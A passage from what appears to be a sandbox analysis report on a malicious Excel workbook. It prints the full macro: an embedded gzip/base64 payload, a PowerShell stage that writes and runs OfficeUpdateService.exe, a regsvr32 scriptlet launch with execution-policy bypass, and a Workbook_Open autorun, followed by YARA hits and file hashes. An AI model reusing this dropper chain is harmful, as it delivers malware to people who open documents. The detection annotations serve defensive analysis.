str = str + "ouQPgtMjkdfzsrKzBWjsi7xkeN2kyjP40n070N6DqmTR7DL6RlOqTTDcyVVg89UeU6BtYf8QgnyCb1b0J9YO1bjgbqQkx6M8EUetT"
str = str + "GUlMqjOoW53Iu2a9lvb+BnL6B1FV/f2Ysc0d8E/Bp81wNaje8m1JYjtYnXutUoE540vvD0EenT75Zrl4+9fyutVLTOScrHMWc2Y52"
str = str + "isk57/YNXHf3V1zmCZU/3ASd7qFr1fOvJjzRdnR/4xkjVmrzxalxde6WE1Hov9LQWvRV4FOSIT/DaNlmeQ+LOTnHENVaDPLLSY+9i"
str = str + "ix+zV6tOu8Uo+/vzGNEMc0QlckSn2PrGeGbRLFR8bB035XlEUmwd0irH2WLJKuS6MMUc5HieWGwnJnMrVjtt3S1uYF6lvRJnmTKFI"
str = str + "soUXw/1ir5hFYsGeI0j2fcypbNM+ZQQt6YBT/E8Sdn8F3gGSj2dZ16ywKbEuM2Du9cbMYK9GDOh34fW4FTfKOhPeOi7Ht/V+G7AFy"
str = str + "PgWYPvOnxP4zuBL7yaJ4cv+PBgNfBgNngQQ3juxhc+JCT1t4nkKMOQZuE4a4ckGuZxKvBKR7Zx0raQCS4hT0mjJuKj0HaOYWrDkc6"
str = str + "SalyRx9RiGUV/BjQLXD7K4yC92iqMfCf0RX80D0iHU4Cm8ZxkSqP2GjkmlMB+rNqDtFrf0MIed9S2XTdnLZAoDStsI0td0sean2C6"
str = str + "OXGPq2dRt81e6bMcm4hlV+PwbvTALRbdi3otZT/XgtwmxghfCzQpjN22HZb7iLewZqp4WiipVFpz29l3bLHdmRMaFcUQMziFgIWYJ"
str = str + "7e5mc2YloGVXNdxi0P2kG22B2uazWmEVbjSdumTqFdEjVP2pOxg1jrK4nSw0RLkUOvgqWjZA0ouej8LR6GIWLiFJxwtjVM8PDnaHP"
str = str + "RcjxRFlxwiQuHYbnxp0yKO1La/duta2WRAVVnEhmyJyGCuVlY1OLNvHbdnr1zpK+txC9vzJNs0zdk2XqMtnrkpe1VajZk7LLYhmiY"
str = str + "7JewEtyefN4iI0ilxnocF7bcGObcXdXYDuh048kStKN0G/FFAN6B3ZfZtvz6sjbChT6Bfh7lfI72dZu86XWbtD359WDsMmmTV0zx3"
str = str + "tqGnc2U2n/x1YnNPma0LV2dr8Fdiaw8vONNok2EK02VXXM3MUUB7HXZWV7hx93CtZVZESJyzticTsw9fr0BDIFrigdoPts9znC6jj"
str = str + "D1M2CxH6o7QR1ws9dewNOhiCYKsv17qtEakK7FX1s097VadWMmtjv3MkbM6yr33fXb8XZFvLy8TI8zdPkjRzzWpjVJH7tDV68ZbeR"
str = str + "XvrKE8H1VHbhrc80KJH2GTlxFERkZIiwZteZ0IKs9yY4F5/RWTAy/3oUFlRcvypiPLR0xBEcGakGO1y4VbbgMyEL/A0ATWr5QdWlZ"
str = str + "w1G7QDrsqQWsKawexLg9EiKl9UMzdtlBpDNgRtBrlNYi2KHQdwmnbAgUR1atxIWm7A+Qd4Klgh7Q7kJ5hFZHkU/ZaO8grXI63+0Xu"
str = str + "vxW4Yxz80NHedkzeAZ7Erdx/CishGfBxbOaK9gw4jsGa5hiADOs4H+aM2nqU63kL812rIcnv1aVpt3vaxwePOTaGQ65t2KCQmzxZU"
str = str + "tlSuw8vU8J9eCn5qNVwllcY8ypjWLTHsFBjkMS7NNbaEZQTZAoanWLpN1VN12rDdsbUsb1J7mvznP66qmwmPYfTDrbYaR73WriaEs"
str = str + "VimGg916/XM5Cv+Au1cDZmg3z4NQT5+2BHOzCWe7gO8VPkMSkB5968kTX1s4d2osHDtpXJQPc46NBxhbjh+nihrUKxZrSllSCYXuQ"
str = str + "ctUmbydgrJrYzCzNwH/IoqovtmuJB0UzYjL2BoshOHqKWyxc5ONognHeXNLlb3iPkEWK5VCc99SG434M1SIT64TD7oKkdXHIQGhAe"
str = str + "Ku2jy+2BPiH/hF7kmFzEV4gV0DIdyw+iDeWEQekQ2h5yMB4LX4yiB1skzzS+Z9DTnZC4EzycEIpxp7jLztH2HBjPKGqN4IsN14Otz"
str = str + "snGWrGBzzs28jk1nWisgW/uBSOVc461DK1hTA+gDUgzfOrRy7gst+i1W2xCbu7py9QcQ3FOXe6znYp7mAvl09trtbvWic612l1vTf"
str = str + "oU/uLp5Y92fOHWt3819dMzH/2rnwpvSlH8nhQ29QAMg7JRSlSfrjZF/QDVqFco0ahPqFFKlSZfVBOqEm3yIRPLRRfrsVh9bE80qqq"
str = str + "xA34PKsUOxcJ+vz92zJdS8QT1qKoRAVDQBNUgOtGmqC68lCF6sQNR6rfRHxCe2KFo1Jh9Eu384ApECXfAwam+lIjNPqOhZPbtfjya"
str = str + "ok0ejYjX+8GpEkWvSmMDClDhfaDpb0zokWgsEzsWy6LTKDhvisZ2+KOBFERsAtkPekEyA9qNJHojM+cDGdT1ChE7ppHsTdFIvaI0L"
str = str + "RULY7OfVJYKT1CRYjSGgPfbWFBqapT1G4kbv0dX/IF6RfWj5VIR1HWiStJ4hCBWo1CQgFCk0sYFuuH3q7E9flaLnx6sfj/pJhrt0V"
str = str + "eC8Sjph5oReMBPnMn6RBUgimOHmghCnaDiQVMPDWTUj060KN2PJAoB3YcmuWjsBCv0JQ2yGLNf4XFuZNQ3dN0bBjNhqd0w6ZJUHA7"
str = str + "7dBrFOj3A/TbFpvyxKeM0KMRm/wlCCWCgCON0XK/3q1E1KsWJktbZpBo1HSPv94R1P4Rg/v2s6hzUBa2i83/F0JOp6Z4mn5+Mxxcl"
str = str + "a8DA6Ixq8mm6GpumcULtV2nQo1EdqTH7s6g/hSrobjoIITHc+KOyJsrYZWioE4JT1a97YwPARcFRgLQJc8mS5jXm5kEFdgv6qleLP"
str = str + "RgAJaRRlfts5JGjWsaDEf9H7jl+eNGalx/FBOoWilB7hZf+iQ2P1oQp4Fc11aPFduA7gG89rAfGi9FXyGAwYnI+qCp3pvK02GFPGV"
str = str + "XVgaRRBVMwGsX+X3stpV+aDKmJI1amsNfMl2/FDE1Y5tmignry/+jVooimfSdP5kazqUN8TzFlX5xI7cnkM3T1RPgUqhhVRKB8kRO"
str = str + "LhiIWyPfGxdTQRHYqW0z1jdNrdlGniODW3u6e7k4k64S4URErRntG165Zt7a7s3vDaE/nmpPZsc7MyXWZzvVr12wcya7tyWbWYEEJ"
str = str + "K0Lv6eqmPyFuVcTirr07hsr34jrs21eb6TdakC26oFxk30elS0X11CZVLkmtsX8ihY/z/3Ejwem38hNvxBdr8sHB7YN3f+vf4smv/"
str = str + "/Pu3/vw6h/GHv0e/RP4on/Tcbo7Uzx+Njc5mctMHd9ujsqrDscP54rTmcnUYGl6LGemIOfa4/ZdhuLxyr0GN2iO3H38YHYymylmXe"
str = str + "iuwpjzy7Bfz897L1TgP3P+P3fzfD56wZ0b7jetHeeyfG+Mb+Jms11jk5NcdqVVpLb+Epyo/Ds4dE8/n6R397PV5fJ3VhvmwdOnBlm"
str = str + "uP3GV+t1wOo8/LcTTnkrJ03SajLBmEAFs9fnAMJ57EczwD2TEJ73ff638f6lz0dxi57yi9k63ENsZd5iDuZ32m9MBftdocvkKbjVk"
str = str + "n0IXeV9bPkXlz/Neek+pVG2N5lL6Fv8apbv8twZBcjdTXgp8v/02oXygWRU6p6oC1lRNyOocWMh39HAboB0s03T2u3vtw1T6zA2qB"
str = str + "agTHw7f2zn4r4TBFXl/Fb664SIrfVQH6vTpQWTUXf4KcYuoQ/3K+wy5G69Ish3woL1BcjZU5c0EPptECO13IzfOLUkjBejC4vfIEy"
str = str + "z3Vo4re/gNl4TWcds2ttNKW2kBY3wCIk8LimUb2sl87rPp5mw+HTnz183vbWIh/TKJy+kNP5W7x61640PnQBPMT5ZzfaznPEtFNuC"
str = str + "fQ6tW47X63sBt+njbl+UTmEk+6fl57bY+J8Q/uibW9z/+qZu3nJuaTJ2xF44WLC4tqax9uXdzy6GhnZ0bWlJFvl81aeazm1vOZ4st"
str = str + "W26JBCPBmzP29aUUSOSLm1umrfym4iiWukyxc8pZCDtHzalNmeJU15meltRUJp87mS2WDrv7A7FUqkxsYAzrR650voon+mtJ0QX3z"
str = str + "S17zvcVCpP2FfeuTKHQskpSKFnTRb64ep389Mqe0bKYHZ220KedB8a+u5Yd22/lzuQms+NYva+P6uqWMhU3HXlzGxzvzp7JTqYmKd"
str = str + "3ckikO5M+Yp7JWS2o618c3DDe38D1pWygmsmoebhzWV1XxfvOqshKQv3mVo9RbxH99/n/8zMrf5H998382I//1+c/4/F+4Yla1AHo"
str = str + "AAA=="";$byteArray = [System.Convert]::FromBase64String($content);$input = New-Object System.IO.Memory"
str = str + "Stream( ,$byteArray );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO."
str = str + "Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress);$gzipStream.CopyTo( $ou"
str = str + "tput );$gzipStream.Close();$input.Close();[byte[]] $byteOutArray = $output.ToArray();[System.IO.File]"
str = str + "::WriteAllBytes(""$env:TEMP\OfficeUpdateService.exe"",$byteOutArray);iex ""$env:TEMP\OfficeUpdateService"
str = str + ".exe"";"

    ' Stage 1: resolve %TEMP% and write the PowerShell script held in str to
    ' %TEMP%\WINDOWSTEMP.ps1. That script decodes the embedded blob to
    ' $env:TEMP\OfficeUpdateService.exe and runs it.
    Set Oshell = CreateObject("WScript.Shell")
    temp_dir = Oshell.ExpandEnvironmentStrings("%TEMP%")
    ps_file_dir = temp_dir + "\WINDOWSTEMP.ps1"
    
    ' OpenTextFile(path, 2, True): 2 = ForWriting, True = create the file if it is missing.
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(ps_file_dir, 2, True)
    objFileToWrite.WriteLine (str)
    objFileToWrite.Close
    Set objFileToWrite = Nothing
    ' Stage 2: command line that runs the dropped script. "-exec bypass" turns off
    ' execution-policy enforcement for this one process, so the policy setting alone does
    ' not stop it. Hunting pivot: powershell.exe with "-exec bypass -File" pointing into %TEMP%.
    Dim powershell_command As String
    powershell_command = "powershell.exe -noexit -exec bypass -File " + ps_file_dir
    ' Backslashes are doubled because the command is embedded in a JScript string literal below.
    powershell_command = Replace(powershell_command, "\", "\\")
    ' Stage 3: build a COM scriptlet (SCT) as text. Its JScript body calls
    ' WScript.Shell.Run(command, 0, true): window style 0 = hidden, true = wait for exit.
    ' The progid "PoC" and the fixed classid are static strings usable as content indicators.
    Dim sct_file As String
    sct_file = "<?XML version=""1.0""?>" + vbCrLf
    sct_file = sct_file + "<scriptlet>" + vbCrLf
    sct_file = sct_file + "<registration" + vbCrLf
    sct_file = sct_file + "progid = ""PoC""" + vbCrLf
    sct_file = sct_file + "classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >" + vbCrLf
    sct_file = sct_file + "<script language=""JScript"">" + vbCrLf
    sct_file = sct_file + "<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>" + vbCrLf
    sct_file = sct_file + "</script>" + vbCrLf
    sct_file = sct_file + "</registration>" + vbCrLf
    sct_file = sct_file + "</scriptlet>" + vbCrLf
    ' The scriptlet is saved with a .txt extension, so extension-based script filtering
    ' will not classify it as a script; content inspection (<scriptlet>, <registration>) will.
    Dim sct_file_path As String
    sct_file_path = temp_dir + "\12-B-366.txt"
    Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(sct_file_path, 2, True)
    objFileToWrite.WriteLine (sct_file)
    objFileToWrite.Close
    Set objFileToWrite = Nothing
    
    'sct_file_path = Replace(sct_file_path, "\", "\\")
    ' Stage 4: signed-binary proxy execution (MITRE ATT&CK T1218.010). regsvr32 loads
    ' scrobj.dll and hands it the scriptlet named after /i:, so the script runs under a
    ' Microsoft-signed binary; /s suppresses dialogs. vbHide keeps the window invisible.
    ' Detection: an Office process spawning regsvr32.exe whose command line contains both
    ' "scrobj.dll" and "/i:"; block with an ASR/application-control rule on Office child processes.
    Dim final_command As String
    final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll"
    Call Shell(final_command, vbHide)
    
End Sub
' Workbook_Open is the ThisWorkbook event handler Excel runs when the workbook is opened
' with macros enabled. Its only statement calls New_Macro, so the dropper chain starts
' without any further user action once macro execution is allowed.
Private Sub Workbook_Open()

New_Macro

End Sub

Macro #2: Module1
»
Attribute VB_Name = "Module1"
' Empty procedure: Module1 contains no statements, so all behaviour in this document
' comes from the ThisWorkbook module.
Sub Excel()

End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
VBA_Create_File VBA macro contains file creation commands; possible dropper -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
C:\Users\aETAdzjz\AppData\Local\Temp\OfficeUpdateService.exe Created File Unknown
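Whitelisted (zero-byte file: the MD5, SHA1 and SHA256 listed below are the digests of empty input, so this verdict reflects an empty file that matches any other empty file, not the payload the macro was meant to write)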
»
Mime Type application/x-empty
File Size 0.00 KB
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2011-05-27 11:27 (UTC+2)
Last Seen 2017-04-19 12:47 (UTC+2)
de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.66 KB
MD5 657ada625cec137fc53e444956261bab Copy to Clipboard
SHA1 a33d091b2aa6689be34815b4784811f45c4dd745 Copy to Clipboard
SHA256 de97ca4ae3df3fff588f38d6ba485cac9513307239aa46c806c3f6ce19a29dd8 Copy to Clipboard
SSDeep 12:TMHdtl46fxhmflbEOEfWKvA1EI+DYQBsOD3O7xVIO/GaBTslXyld:2dti6fxhmflYZf8P+Kw3O7x6O/BTsEld Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2012-12-21 23:40 (UTC+1)
Last Seen 2018-11-28 16:48 (UTC+1)
901734ae6b4b668d23512343a5bc0b1cad9401cfa095ff37365e85410f203c95 Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.77 KB
MD5 446d99f36c6f29f8330d58bc3655eb71 Copy to Clipboard
SHA1 a055ba0b49550175879948cd4d9bd8d0d0394b0c Copy to Clipboard
SHA256 901734ae6b4b668d23512343a5bc0b1cad9401cfa095ff37365e85410f203c95 Copy to Clipboard
SSDeep 24:2dt06fxhmflYZf8qC+B22n12LZ4mLXAQJ:cV5hmNYZt1B7E4mzAO Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2016-07-08 02:01 (UTC+2)
Last Seen 2018-04-14 13:19 (UTC+2)
ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Embedded File XML
Whitelisted
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/xml
File Size 0.66 KB
MD5 c1a08e4a5909ec8a545236a0d9bce44d Copy to Clipboard
SHA1 63561ba33e3e8615f5883f6da15de948ad65578a Copy to Clipboard
SHA256 ccfd9fdf98e7ecdee89d8d98365cac678000cdf350d49f87ac37debe4f0d732d Copy to Clipboard
SSDeep 12:TMHdtWa6fmEUdzXb6flbEIWOgzXa6flbEetzXV6flbEpSp0HjzXQ4+DYQDE0US1V:2dtWa6ffa7b6flYIO7a6flYq7V6flYm1 Copy to Clipboard
File Reputation Information
»
Severity
Whitelisted
First Seen 2013-03-17 16:09 (UTC+1)
Last Seen 2018-11-28 16:48 (UTC+1)
C:\Users\aETAdzjz\AppData\Local\Temp\WINDOWSTEMP.ps1 Created File Text
Unknown
»
Mime Type text/plain
File Size 17.76 KB
MD5 e6d55fffc72e853d24440ef89e216611 Copy to Clipboard
SHA1 293a8817bc2e35ad4db630dd58dc8229523ac252 Copy to Clipboard
SHA256 93a530e6d04e88730fd787d31f9a8e69fcbae3a14ba650008d1b5712ecb2cfb2 Copy to Clipboard
SSDeep 384:LOi5Zg5RQ60lRrUbLmagfOypXquFGRawwha5gCvZQ28kS4n:Lh57lRruLm1dGRNw05gAZR86n Copy to Clipboard
c:\users\aetadzjz\appdata\local\temp\12-b-366.txt Created File XML
Unknown
»
Mime Type application/xml
File Size 0.36 KB
MD5 ce86eb5b2736c66df0af4dd826d4dd55 Copy to Clipboard
SHA1 17d630f02db15facff4e0acd56f3559b092df81f Copy to Clipboard
SHA256 b2c99d88252ab0b9ab4be05290afaaa8e64bbcd9292dfe07cef905b2f37e5d33 Copy to Clipboard
SSDeep 6:RlS0tu4oQ+KmWP+GGJ7vuYOMiUXZrlNHsnyLmyCpYOaoNkDv5NrjSTptZAB/MGni:Rlz9T16GgrXsnF/E5N3rMG4wI Copy to Clipboard
44f17db02bafeba41c4a4fbdf8b51db19b474494e2d7ad61a1e7ccf9bbb0d97b Embedded File Unknown
Unknown
»
Parent File C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls
Mime Type application/CDFV2-unknown
File Size 59.00 KB
MD5 dd2b4d38f97c936d59a3a4f3da7c5a63 Copy to Clipboard
SHA1 4214d027373c30e57eac5ada7ba89ace2123ef51 Copy to Clipboard
SHA256 44f17db02bafeba41c4a4fbdf8b51db19b474494e2d7ad61a1e7ccf9bbb0d97b Copy to Clipboard
SSDeep 768:HiBmb4bB/lusULOOteXORC7x55GZv4FQDnAAJxBUFtCaPuIhNXEIpZSPu:HiBC4FlusKDs7x5EDnAEDSAamIhlb Copy to Clipboard